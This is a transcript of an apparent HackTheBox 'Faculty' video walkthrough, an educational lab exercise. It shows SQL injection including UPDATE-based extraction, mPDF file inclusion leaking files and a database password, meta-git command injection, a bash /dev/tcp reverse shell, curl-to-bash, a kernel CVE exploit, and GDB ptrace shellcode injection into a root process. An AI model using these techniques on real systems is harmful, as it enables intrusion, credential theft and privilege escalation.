What's going on YouTube? This is Ipsec. I'm doing faculty from HackTheBox, which starts off with one of the most SQL injectable web apps I have ever seen. Oddly enough, the only thing you have to do is bypass login with SQL injection, which is pretty easy, but we're going to spend some more time do SQL injection on an update statement because, well, why not? I don't think I've done that before, so it's fun to show. But the route to get onto the box is through a PDF generation portion of the web app that uses MPDF as a library. Essentially, you supply it some HTML, it generates a PDF. So you can use HTML annotations to add a file to that PDF and leak files on the box, which includes web source code. So you can leak the PHP config file that says how to connect to the database, get a password, reuse that password to log into the box through SSH. There's a few privescs on this box, but the coolest one is GDB has the ptrace capability, which I think is poketrace, which allows you to just inject shellcode into any running process. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it faculty, and then the IP address, which is 10.10.11.169. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one being SSH on port 22, and its banner tells us it's an Ubuntu box. The next thing we have is HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu. And it also tells us the HTTP title is faculty.htb, so we should edit our host file to say that. So 10.10.11.169. and http faculty.htb. So with that being said, let's go browse the website. So I'm going to go to 10.10.11.169, and it should redirect me to faculty.htb, which, did I screw up? 10.10.11.169. Oh, I have HTTP here. So let's get rid of that. And then refresh this, and we get to the login system. It asks us for a student ID number, so we're just going to enter things, and we just keep getting it is incorrect. So let's try some basic SQL injection. If I put a single quote here, I'm just seeing if it says the number is incorrect as well. If it said like some type of formatting error or gave us a error message, we knew right off the bat it would be SQL injectable. We can try or 1 equals 1 and then put a comment, and we get logged into this application. So the first thing I want to do is just a gobuster before we get too far. So gobuster -u http faculty.htb, then -x for extension PHP because it is a PHP web app, as we see in these extensions. And the interesting thing is, it's an Nginx server that is running PHP. Generally, you see it as Apache, but at least when it's not using a framework such as Laravel. I see Laravel using Nginx quite a bit, but these things that are just like a .php file, generally I see them hosted on Apache. Let's do -w for word list, opt, sec list, discovery, web content, raf small words, .text. And then, let's see, gobuster dir -h. Is there a cookie option? Let's see, username, follow redirect -c. Cookies are used for the request. So I'm going to do -c, and let's pull my cookie out of here. So when our gobuster runs, it's running as an authenticated user since, well, we're authenticated. So PHP sess ID. So let's just do PHP sess ID equals. That's not looking right. And I erased. Shoot. Let's log in again. Okay. Copy this, paste, put the thing in quotes. We need to put this in dir mode. And right off the bat, we do have a /admin, so we should check that out. So I'm going to go to /admin, and we get, looks like the administration page. So clicking on course list, we have a list of courses and a course form. If we click on edit, it looks like we can create a new course. So that's going to be the first thing I try. So let's send this over into Burp Suite, go on a proxy tab, intercept this, send it over to repeater, and then I'm going to turn Firefox off, refresh the page, because anything we edit, we just want to see it live. And this is going to be like a second order SQL injection because this is an update statement, so I'm not getting the information back. I'm just changing in the database. And then it says 1, which I'm guessing means success. Refresh. And we see the course is please subscribe. So the next thing I'm going to do is a single quote to see exactly what happens. We don't have any information here. It didn't say 1. And going here, it still says please subscribe. I'm going to say thank you because I know you subscribed in what I said. Refreshing. We still don't have it. So we can confirm when it says 1, that means it probably updated the database. So let's add a comment after this. We see 1, refresh, and this is like every DBA's worst nightmare. We updated every single course. That's definitely not good. So let's take a step back at exactly what happened here. Because SQL injections and updates, I don't think are talked about that much. So generally when you do an SQL injection, you do a select statement, then they select some values, and then from some tables where, and this is going to be your SQL injection, right? This is where your user input is. I'm going to move notes.txt to notes.sh. And now we have syntax highlighting. So it makes it a bit prettier, I guess. So when we do injects here and we add a comment like this, and then anything the code has afterwards gets ignored, nothing bad happens because we're really far into this statement, right? Well, an update statement looks like this. Update, table, name, set, and then I think it's just the column name, or like set, what is this? Course equal to value where, and then I'm guessing there's an ID here. Yep, there's an ID. So ID is equal to 1, like this. And actually, it's letting us set the description as well. And I want to say that's just a comma. So description is equal to value 2. So it's kind of like this. But we did SQL injection all the way over here and injected a comment. So the where clause got dropped. So it went into the table and set the course for our value for everything, right? So when we do SQL injection, at least in a union, we should be conscious of the where statement. So now I'm going to update this to be please subscribe, hit enter, and we go back to the page, refresh, and we only changed it on the first one. So always be careful with SQL injections, at least on updates. So the next piece of the puzzle is we have to put some dynamic variable in here. And we could play with this. So if I do like plus at version, we get nothing. If I just do at version with the comment here, it's going to say at version. So we really need to find a way to put dynamic content in. And we can't use like concat or something because we're already in open quotes, but we can update something else. So I'm going to do that comma, and then description is equal to, and we'll just say thank you and see what happens here. So we get a 1. That's good. Refresh, and we have please subscribe, thank you. So now, since I have full control over this, like full control meaning I can edit the first apostrophe, I can just do at version if I type that correctly. And then we refresh, and we have dynamic content here. We could also do like user to see the username, refresh, and get that. But the main thing we want to do is extract the database, right? So what I'm going to do is put a SQL query in here. And the easiest way to do that is just in parentheses. So now the description should be set to 1. It is. So we can just write a query here. And this is MySQL, so we just want to extract data out of the information schema table. The first one we want to extract is schema name. And this can be the database name. So select schema name from information schema.schemata, like this. And we don't get a 1, so our query has failed. If we refresh, the description still has not changed. And I'm guessing because this returned like multiple rows, and this isn't expecting multiple rows. So this is expecting it to return like a string, and we returned a array or list. So what we're going to do is a group concat on this schema name, and that's going to take all the rows it returns and return them as one line. And we see 1 right here. And then we can refresh this page, and we see 2 databases, information schema and scheduling DB. So now I'm just going to save this, and I'm going to call this DBs, and then we will Control R to open up a new one because we want to take other information. So we want to extract the table name and then put a colon in and the column name. And that's going to be from information schema and then the columns table. And we're going to say where table schema, this is going to be the database, is equal to, let me just copy and paste this, scheduling DB, like this. And we did not get a good thing. So we screwed up somewhere. Let's see. Select group concat table name, column name from information schema dot columns where table schema is equal to scheduling DB. I think that's correct, but it's telling me otherwise. So let's simplify this. Oh, I have a double quote right here where column name is. There we go. So now the page is going to load, and we should have a dump of all the columns. So now let me paste this. And then what we're going to do is sed. So I did colon %s. I'm going to search for comma and replace it with a return. We can just delete these rows up here. And now we have a list of all the tables and their columns. I'm looking at faculty. I don't see password here, so I'm not really that interested unless I want to like extract all the emails from faculty, but I'm not interested in that. All I want is creds. And I can see there is a users table. So user, and then we got username, password, and type. So let's extract this. Actually, we got name too. We'll extract everything. So let's do group concat, select, we'll do dump db description, I guess. I forget what it's called. It's maybe schema or something, but so let's go back here to the group concat. And what we want to steal is ID. Then what was it? Name, ID name, username, then password, and type, I believe, was the last one. And then we just have to do from, let's see, when group concat and the parenthesis there, from users. There we go. Refresh this page. And we'll get a list of every user. And we got 1 administrator admin. And 1. So v creds. And I know this is not crackable, so I'm not even going to try, but something is odd. I'm looking at this page. My name is Smith John. This is administrator. What's going on? And the answer to that is there's two vulnerabilities in play. We got the SQL injection here, right? But there's another SQL injection here. If we just do name is A or 1 equals 1 like this, we log in and now we're administrator. What I'm guessing is there's no access control check on this page. So it's more of an IDOR like vulnerability, I guess, maybe. And I don't know what it is. It's bad, right? There's no sense of privileges in this web app, it seems. So we logged in as what I guess is a student with the ID. We hit admin and the web app's like, you know the location of the admin. Here it is, right? There's no permission checks in this page. It's awful. And if you Google like the faculty scheduling system, we can find the source code because this is just on, I want to say like Codester or something. Let's see. Let's do this. Go to Google. Let's see, exploit DB, source code PHP. It's, yeah, source codester. Like anything you see on this website, just assume it's vulnerable. So we could have done static code analysis and figured everything out, but I prefer going this like whole black box style, right? So doing this SQL injection was a complete rabbit hole, but I found it cool because I got to show the update syntax, which I don't think I have on ipsec.rocks, so wanted to add that. The actual vulnerability is within this PDF thing. So let's intercept this. This will be dump users and turn intercept off on. Intercept this PDF. Data generated. Oh, we blocked a pop-up window. Let's allow pop-ups. And we get this PDF, right? But how this works, if we intercept it, we can see just a big base64 blob. So what I'm going to do is echo, and then we'll base64-d it, if I can type correctly. And we see it's URL encoded, it looks like. So whenever I see double encodings, my first thing is just go over to CyberChef because it makes it so quick to do these type of things. I got to turn Burp Suite off. Let's see. CyberChef. And where is it? This is just me, the source code, right? The first one. I always like ignore the first result because I just assume it's an ad. So we got base64 here. We can do from base64, then URL decode. We see it looks like it was double URL encoded. So I'm going to do another URL decode. And here we have pretty much what we saw in this PDF. I don't have it anymore. Refresh. Click this. And we can see what we have in the PDF is here. And most of the time when people see this type of vulnerability, they're just like, well, I guess you can create phishing documents out of this because you can make legitimate looking PDFs. People often forget that when this HTML is processed by the PDF engine, there's a chance to include things off the server or make the server do things, right? So I'm going to disable all of these and we're going to do a double URL encode, because we just want to be able to create the same base64. Okay. And then what I'm going to do is base64. So we do 2. And then we can edit this. And we'll just do HTML, IPSEC, bold, IPSEC. And all I'm doing right here with this payload is testing if I can write HTML, which in the back of my mind, I know I can, but I'd like to see it anyways. So I'm going to probably put this in repeater. It gave us this PDF. And do we have what saved? We do. So I can just do this, and we see IPSEC twice, once in bold. Awesome. So the next step, I'm going to do sudo nclvnp 80. And what I'm going to do here is go back and we're going to try a iframe and see if we can make the server reach back to us. If we can make the server reach back to us and it doesn't have any like sanitization whatsoever, the next thing would be like trying to include files off the server. So 10.10.14.8 like this, and then we can close it. Copy, paste, refresh. And we actually don't have to download this PDF because we're triggering a vulnerability when it's generated, and it's not coming back to us. So this did not trigger anything. Like, I guess we could open the PDF and see what happens, but any vulnerability there would be on us, right? I was trying to trigger a vulnerability when the PDF is created on the server. So let's just try this. Refresh the page. Oh, not found. So it's automatically deleting PDFs. But this, not found. Let's just do this quickly, I guess. And the PDF doesn't reach back to us either. We do see MPDF here. And if I download this, let's do a wget and examine it with exif tool. We can see MPDF version 6.0. And we could search this for exploits. Generally, if I don't find exploits publicly, I look for the source code, so MPDF GitHub, because I assume this is open source. It is. And then I would go over to the issues and search these, right? So I'm going to take the is open off, and I'm just going to type security. And we can see vulnerabilities in this. So we got SSRF, open action, annotation tag. So if we look at this, it looks like vulnerability, MPDF. That's odd. I guess maybe I need XML and then it works. I'm going to try copying this real quick. I honestly don't know this. Will this work if it's XML and not this? And I could be doing this piece wrong because when I initially did the box, I did not look for that. So let's try this. Sudo nclvnp 80. It does. Wow. I did not realize we could trigger it that way. Is this one open still? No, it's closed. So out of curiosity, let's go back to CyberChef. If I do file : / etc passwd, I do 3 slashes so it always goes to the root directory. That was intentional, not a typo. Let's paste this, put this in, go here, and paste it. XML. And it doesn't look like it includes the file, right? Just for a sanity check, I'm going to wget this. And then we're going to go to places, home, and then what is it? HTTP faculty. And then this one is P6. Here it is. So we don't have the etc passwd included. But we can make the server reach back to us, which is pretty cool. So that's another vulnerability, I guess. So let's go to the annotation tag. And this one's talking more about LFI. So let's try this. So copy. And then go to CyberChef, paste this, copy, Burp Suite, paste, copy, browser. There's a lot of jumping around right now. Put this in. We don't have anything here. Let's try a wget. See what it looks like locally. Ends in YK. Right here. we do have this little button here, and clicking it opens up passwd, and this is going to be of the server. So we have a few users here, so I'm just going to copy this, I'm going to just call it passwd, paste it, and what I'm going to do is grep for everything that ends in sh on passwd, and we can see there's likely 3 users in the box: root, gbyolo, I don't know how to pronounce that, and developer. So we can close this out. And at this point, we should just be looking at the source code, right? So let's go here, annotation file. I wonder if I just can do like index.php, and if it will grab some PHP source code. So let's paste this in, go to repeater, paste, send, copy, change this file name, ends in BS. Where is BS? There it is. Open. And we have the index.php. And I did this because I'm looking for where the database is. So maybe that's going to be in login.php or header.php. We probably want those 2 files. So what I'm going to do is we're going to try something. Let's see, annotation file. Okay. Oh, the content I did not update. Oh well. So what I wanted 2 files. So I'm going to be greedy and try including both of them at once. So we want to try including login.php and header. So let's change this, login.php, and title, attach file, login.php, X position, I'll do 95. And this one is just going to be header.php. We can make this bigger, I guess. Okay. So is this going to attach 2 files? That is the question. Paste it. We can do a wget, ends in cy. YK, CY. Hey, we have 2, I think. So this is login.php. And I don't see anything about the database. Let's grab this. This is going to be header. And we still don't have anything related to the database. Oh, DB Connect. I'm blind. It is here. So in login.php, there is a dbconnect.php include. So let's go and grab that. And since this source code was public, I mean, we could have just downloaded the source code and found all the files that way. But I kind of find value in doing this to find out how you would have found it black box, right? Since we can extract PHP source code, show the files like I was trying to grab, right? So we got this. We can copy, go over to Burp Suite, paste it in, do a curl or a wget on this, ends in z something. No, here it is. And I'm going to copy this into vdb php, or what is it? dbconnect.php, just to make it a bit easier to read. And we have a username of sked, and then a potential password here. So let's save this. cat it out so it can copy easier. And I'm going to try SSHing in with these users, right? And if we went back here to our grep, we have 3 potential users. I'm not even going to try root because normally root login is disabled, especially with passwords. So we'll try gobuolo first, 169, paste in the password, and we get logged in. And if I had a lot of users, I'd probably use like crackmap exec with SSH, but if it's only 1 or 2, keep it easy and just manually try it is what I'd say. The first thing I generally do whenever I log into a box as a user is check sudo, and we can see that the user can run this file called Meta-Git. So the first thing I do is like a file against it, and we see it's a symlink. It looks like it's a node module. So I'm going to copy, just less it, and we can indeed see it's something. So my first instinct is looking at that sudo rule again, actually. So we can execute the command, and I'm guessing we can do it with arguments as well. So let's go to like GTFO bins, and we can see if Meta-Git is here. It is not. And then I can just Google like Meta-Git RCE to see if there's any like vulnerabilities. And right at the bat, we have this post on SNCC and also HackerOne. And it looks like SNCC is referring to a HackerOne report. These look like they are the same thing. So we can see, let's see. Whoops. I was just trying to turn it dark mode. Reporter RCE in this, steps to reproduce. It looks like they just do Meta-Git clone and then some type of command injection here. So let's copy this. Let's do sudo -u and then developer. And then we can paste this. And I'm going to do temp and test. So now if I just do lsla on temp, we do not see it created. So git clone. Let's see. What if we just do a colon? ls temp. Nothing. Let's see. Spawn. Bin sh. Permission denied. Change dir. I don't know exactly what it is doing here. What if I go into temp? We do this. And it works. So oddly enough, I guess the sudo was taking, keeping my home directory. And then because it kept my home directory, it didn't have permission because I was switching to the developer user. I'm guessing something weird like that just happened. But we can see this file does exist. So my next thing is I'm going to go to dev shm. I'm just going to create shell.sh. We'll call it bin bash and then bash-i dev tcp 10.10.14.8 9001 0 and 1 like that. Okay, let's chmod +x shell.sh. And I'm just going to test it. Looks like it works. So let's listen again. Go back into temp. And we can go do this sudo command again. And this time, I'm just going to execute dev shm test.sh. Hit enter. I wonder, does this name have to be unique? Nope. Let's see. If we do bash, exit with error. No such file directory. Test.sh. I wonder if we don't have the ability to change directories. That did not work. So sudo su developer metaclone. No such file or directory. Dev shm test.sh. Whoops, I need a space there. So where's my touch command? That worked. If I touch dev shm test. Oh, I'm doing test.sh and it's shell.sh. Helps to have the right file name. So let's now fix our TTY. So I'm going to do stty-a, rows 26, columns 105. Actually, instead of fixing our TTY, do we have an SSH key where we can just SSH in? There's a SSH directory, cat ID RSA, and we can just copy this to log in. So copy. V developer dot key, paste it, chmod 600, sh-i, developer at 10.10.11.169. Awesome. So now we have a proper shell. We can exit this, which will close that one exploit. And we are the developer user. So I'm going to do sudo-l, and we don't know the password. There is this send mail. Oh, so gbyolo had some mail here, just, I guess, hinting at the existence of the Git thing. But don't have a password. So let's just check this user's cron tab to make sure the send mail is being ran by him. And there isn't like a parent cron tab as the root. And since I did cron tab-l, it's going to show me my user's cron tab, which shows I am executing it. If this was like the etc cron tab file, we'd have to see a username as well. So I can just look at this and you can see the usernames in this. But if I did not see this sendmail.sh thing in here, I'd find out exactly how this thing's getting executed. But now I know developer is executing it. So I'm just going to go over to LinPEAS now to see if that tells me anything. So I'm going to go LinPEAS, GitHub. Looks like I already have it in my history, so I can just go there. We go to the root of the GitHub, go to releases, and then we can download this. So let's make dir wget it, and then python 3-m http server curl 10.10.14.8 8000 linpeas.sh, pipe it over to bash, and when this is finished, hopefully it tells us what we have to do. Okay, so now that linpeas is done, let's go to the top and we can find it. So scrolling down, looks like it is vulnerable to CVE 2022-2588. I don't know what this one is, so let's check it out. Looks like there's a GitHub right here for it. And is it as simple as just executing? If it is, we can test it. Never ran this, not intended on this box, but looks like it's a relatively new CVE. Oh, what does it test it on? Does it say? CentOS, Ubuntu 17, 18, 19, and 20. I'm guessing this is in that, so it probably will work. So let's try this. So wget, let's just make sure it's a elf. It is not, so maybe I'll just do a git clone. That would be the fastest. And then cp CVE 2022, this over top of it. And let's do a wget 10.10.14.8 8000, and then exp file credential chmod +x, and execute it. I don't know, my shell just died. I did /s and then it just stopped working. Did my VPN just die? Ping 10.10.11.169. Looks like I can't reach it, so I'm going to power the box back on and we'll try it. Okay, so I just had to reconnect to the VPN. Let's just execute this and see what happens. So it's starting the exploit number of cores, doing some things, and it looks like it succeeded. So cat etc passwd, set it root to this file, and we have user. So it looks like it did right. I don't know what this password is. Does this tell us what it set the password to? Let's see. Password. The password is user. So su-user, password is user, do ID, and since they created this user with a UID of 0, is effectively root, and we can get root.txt that way. So, yep, that CVE works. That is definitely a unintended path to this machine. But let's go back to the LinPEAS. So curl 1010. Okay, so at LinPEAS, that CVE works to pop this box. Going down, this is going to be the running processes. I don't really see anything too interesting there. Scrolling down, I'm just going to go to the capabilities because that's what I want. So capabilities, and looking at all these files that have capabilities, this one stands out because I don't know what GStreamer is, but it only has capnet bind service and capnet admin. So we could potentially exploit this to listen on ports and I think do like a TCP dump. So maybe if we're supposed to look at network traffic, we should go down this chain, but the more interesting one is GDB has capsys ptrace, and this is poker trace. This essentially means we can use GDB to inject code into other processes. So what I'm going to do is, I guess we can confirm if we do get cap on GDB, which GDB get cap user bin GDB, we can confirm we do have this ptrace. So if we're going to inject into a process, we should use shellcode because that's going to be what gets executed. So I'm going to do MSFVENOM -- list payloads. And we want to get to the reverse shell TCP because I just want to have MSFVENOM send us a shell. We could do other things. We could have like the system execute a reverse shell on dev shm shell.sh. We could like make bash set UID. There's a bunch of things we can do, but reverse shells are always fun. It's reverse TCP. So that's Windows. We want Linux. Maybe it's shell reverse TCP. Encrypted. Windows, Solaris, Ruby, Python. I think it's just Linux x64 if I don't find it soon. x86, this is a 64-bit machine, so here's the payload we want. I'm going to do MSFVENOM-P, specify the payload, then lhost is 10.10.14.8, lport is equal to 9001. We're going to do format Python, and -out, I'll call this revshell.py. And it's an important notation that this is the shell underscore reverse TCP. That means it's a stage list payload. Every piece of the payload is into this exploit. If it were shell/reverse TCP, this would be a staged payload, which means it's only got a stub that reaches out to somewhere else to get the rest of it to execute. And if it was the one with the slash, we just have to use like MSF handler because it wouldn't have the full reverse shell. Now, the reason why I got it in Python format is we're going to have to convert this into, we're going to have to change the endianness, right? Because if we just executed this and injected it straight into memory, we don't want to inject it like this because it's actually looking for, let's see, I want to say it starts at 6A. 99 is the first syscall, and it reads it backwards at a time, right? And the reason why this is 1, 2, 3, 4, 5, this is only 5 bytes in, is because the payload itself is not divisible by 8. Everything's going to be divisible by 8. This is 74 bytes. So this is 2 off, I believe. So 72, we need 80 bytes. So if this was, let's see. Let's just do the code first and then we'll explain it. I think that will be the easier route. So what we have to do first is, let's move it to a different pane so I can open up 2 things easily. So we're going to call this one rev shell. Was I in dub? Yeah, I was. Let's just move that up. Okay, I'm going to do Python 3. We'll do Python 3-i rev shell. And what that's going to do is execute the script and then drop me into an interpreter. So if I do len buff, we see it is 74. Now I'm going to do a modulo 8. So that's percent, if I can find the percent key, 8. And it's 2. And all this does is divide 74 by 8 and tell us the remainder, right? So 8 times 8, 64. So 8 times 9 would be 72. And this is 74. So the next piece up would be 80. So in order to go from 74 to 80, what we're going to do is this len and then minus 8. I think. Maybe another parenthesis. There we go. So 74 plus 6 is equal to 8. And this is going to come in handy because now we can pad the buff, right? So what I'm going to do, go up here, and we're going to say the buffer, well, I'll call it payload. The payload is equal to \x90. This is going to be 90 in hex. In assembly, this is a NOP, or no operation, means it does nothing. So we're going to multiply that by this 8 minus the length of our buffer, modulo 8, and then plus buff. So we save this, and now all we did was put 6 NOPs right up here. So the next piece we have to do is convert the endianness, right? So I'm going to do for I in range, 0, the length of the buffer, then 8. And all I'm doing here is I'm going range 0 to, this will be 80. And I'm counting in a step. I think that's what this one is called, an 8. So if I just printed I here, right? And then we execute this, it's just going to print all the I guess multiples of 8 would be the right word to use. Rev shell. If I had the right number of parentheses. Where is that mismatch? It is saying it is up here. So I have an extra parenthesis. There we go. So it just prints the multiples of 8, right? So now I can do some, I guess it's binjitsu or stringjitsu, whatever you want to call it, and take this string 8 characters at a time. So I'm going to do payload, and then I'm going to go I. This is going to be the starting. And then we're going to grab it up to 8 characters after it. So the first thing is going to be 0 to 8, then 8 to 16, and we're just going to grab it in chunks like that. And then because we have to swap the endianness, which means reverse the byte format, we're just going to do a -1 like this. And then the next thing we have to do is convert each byte into hex so we can print it out. So what I'm going to do is for byte and chunk. So I'm going to go through each byte in this chunk, and we're going to create a variable called chunks. And this is just going to start with 0x. And we can say, we can append the chunks, then f string, and then the byte in hex format. And then at the end, if I print chunks, we can see what this looks like. We should print chunks here. Whoops. So this is what it looks like. And this is because of the padding. This is going to be the 6 nops. So 1, 2, 3, 4, 5, 6. So let's go back here. And it starts at the, let's see, 6A29. And then let's see. So what we did with the reverse byte format. So we got 5, 8, 9, 9. So 1, 2, 3, 4, 5, 6, 7, 8. So 5E, we have 5E up here. 0, 1, 0, 1 here. 6A, 6A, 5F, 5F. So that's why we reversed it, because that's how it's going to want it in memory. So I really hope that makes sense. The NDNS knowing when to do it is always a pain. So now that we have this, what we want to do is, instead of just printing the chunks, we want to print it in a format that we can use with GDB. And in 64-bit, RIP is the instruction pointer. I don't know what the R stands for, but IP is instruction pointer. So instead of just print chunks, we're going to print, and then we're going to say set long, and I'm doing it in double brackets here because I'm in an F string. If I just did this, because it's this F string, it would try to like templatize, or whatever you want to call it, this long. And since there's no variable long, it would just error out or do nothing. So that's why I do these double, because that's how you escape the brackets in F strings. And now we can say RIP plus, and then we want I. So this would be plus 0, plus 8, plus whatever, right? And then is equal to chunks. Okay? So now, if I execute this, we can see what it's doing. It's going to set RIP at 0, so the current register, to this variable. And that's the very first thing. And then RIP plus 8 to the next, and so on. So now when we copy this, we can go to where reverse shell is, or SSH session, I should say. And we want to use GDB on any process that's running in root. And a good thing to note is this will probably crash the process, because we're just going to attach a debugger and then say the instruction pointer is now here. We're not doing anything to save where the instruction pointer currently is. So there's no way for the code to return back to where it naturally was after this. So when we pick a process, we're definitely going to want to pick a process that will die. And funnily enough, because we did the exploit, all the root things says it is user now. So let's see, su dash, can I fix this real quick? Because that is annoying. Let's see, passwd. We delete this from passwd. Please say I didn't screw up the box. Sweet, we still have root. Okay. So now when I do this, it's showing me all the root processes. And the one that sticks out to me is like the sleep 20, because if we crash a sleep command, the worst that's going to happen is the sleep finishes early, and hopefully that doesn't cause an issue. But like if we did Nginx, we could crash the web server. We don't want to crash SSH because that's where we are. Maybe modem manager would be a good one because I can't imagine us using a modem, but I'm going to do sleep 20 or the sleep command because if I crash sleep, who cares? I assume the sleep's going to happen again. So if I do pgrep sleep, we only get one PID. So I can do gdb-p to attach to a process. And I'm going to do pgrep sleep. So now we're going to attach to the sleep process. And we're here. I could do, let's see, x/x RIP to examine it. And what we're going to do is change it. So let's copy all of our code here to overwrite this, do the set. And now if I do this x/x on RIP, we can see it's going to start at our nops, and then it's going to go into our shellcode. So I'm just going to hit C to continue, and we get a connection. If I do ID here, we are root. So I can go cd/root, and then we can cat root.txt, and voila. So that is essentially how we do the box the intended way. I hope you guys enjoyed that video. Take care, and I will see you all next time.